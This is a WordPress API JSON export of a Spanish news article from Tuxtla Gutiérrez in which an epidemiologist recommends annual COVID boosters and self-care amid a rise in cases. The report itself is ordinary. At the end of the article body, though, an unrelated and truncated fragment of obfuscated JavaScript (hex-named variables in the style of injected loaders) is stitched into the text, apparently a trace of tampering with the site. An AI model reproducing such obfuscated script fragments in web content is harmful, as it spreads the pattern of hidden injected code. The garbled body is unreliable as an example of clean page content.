{"id":13858,"date":"2024-01-29T03:19:18","date_gmt":"2024-01-29T03:19:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13858"},"modified":"2024-01-29T03:19:18","modified_gmt":"2024-01-29T03:19:18","slug":"epidemiologo-recomienda-vacuna-como-medida-de-proteccion-anticovid","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13858","title":{"rendered":"Epidemi\u00f3logo recomienda vacuna como medida de Protecci\u00f3n anticovid"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"479\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1706498331385.jpg\" alt=\"\" class=\"wp-image-13859\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1706498331385.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1706498331385-300x187.jpg 300w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores. 28 de enero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Daniel Salazar, m\u00e9dico epidemi\u00f3logo, dio a conocer que, lamentablemente persiste una creencia en la poblaci\u00f3n acerca de la vacuna anticovid, y es que, algunos ciudadanos piensan que no sirve de nada, cuando la realidad es que representa una protecci\u00f3n real. En el contexto actual en donde se est\u00e1 presentando un repunte en los casos de Covid as\u00ed como de enfermedades respiratorias, es de gran relevancia tomar medidas preventivas para aminorar riesgos. \u201cLa poblaci\u00f3n debe entender que el Covid es un virus latente, que va seguir entre nosotros, que no se va ir, continuar\u00e1n los contagios y una de las cosas que debe tener en cuenta que, uno de los principales medios de vacunaci\u00f3n es la vacunaci\u00f3n\u201d, coment\u00f3. \u201cEs lo m\u00e1s importante, la poblaci\u00f3n cree o tiene la idea de que al haberse contagiado ya es inmune pero no es as\u00ed, los refuerzos deben ser anuales del biol\u00f3gico, no importa la marca, no debemos esperar una marca en concreto\u201d, expres\u00f3. El especialista dijo que, el repunte de casos es un tema que se ten\u00eda previsto, puesto que, se trata de un panorama c\u00edclico.Subray\u00f3 que: \u201cEl virus va mutando, la realidad es que, no se ver\u00e1 un panorama similar al de los primeros a\u00f1os de la pandemia, la poblaci\u00f3n ya est\u00e1 vacunada; esto explica que s\u00ed sirve la vacuna\u201d. Otro factor a considerar respecto a los cuidados que debe tener la poblaci\u00f3n son aquellos que padecen enfermedades como la diabetes, o enfermedades pulmonares que favorecen la prevalencia  a que, el virus sea m\u00e1s agresivo, m\u00e1s da\u00f1ino. \u201cLa invitaci\u00f3n a esta poblaci\u00f3n es que redoble esfuerzos, que cuide su presi\u00f3n, que cuide su diabetes, el sobrepeso, la mala alimentaci\u00f3n\u201d, coment\u00f3. En este escenario, recomend\u00f3 a la poblaci\u00f3n mantenerse hidratados ya que, las altas temperaturas pueden generar enfermedades gastrointestinales que combinadas con el Covid pueden complicarse en extremo. Por \u00faltimo dijo que, los par\u00e1metros de autocuidado y limpieza personas ya est\u00e1n establecidos, \u201clo que queda es seguirlos, ser responsables y cuidarse\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 28 de enero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Daniel Salazar, m\u00e9dico epidemi\u00f3logo, dio a conocer que, lamentablemente persiste una creencia en la poblaci\u00f3n acerca de la vacuna anticovid, y es que, algunos ciudadanos piensan que no sirve de nada, cuando la realidad es que representa una protecci\u00f3n real. En el contexto actual en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13859,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-13858","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13858","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13858"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13858\/revisions"}],"predecessor-version":[{"id":13860,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13858\/revisions\/13860"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13859"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13858"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13858"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13858"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}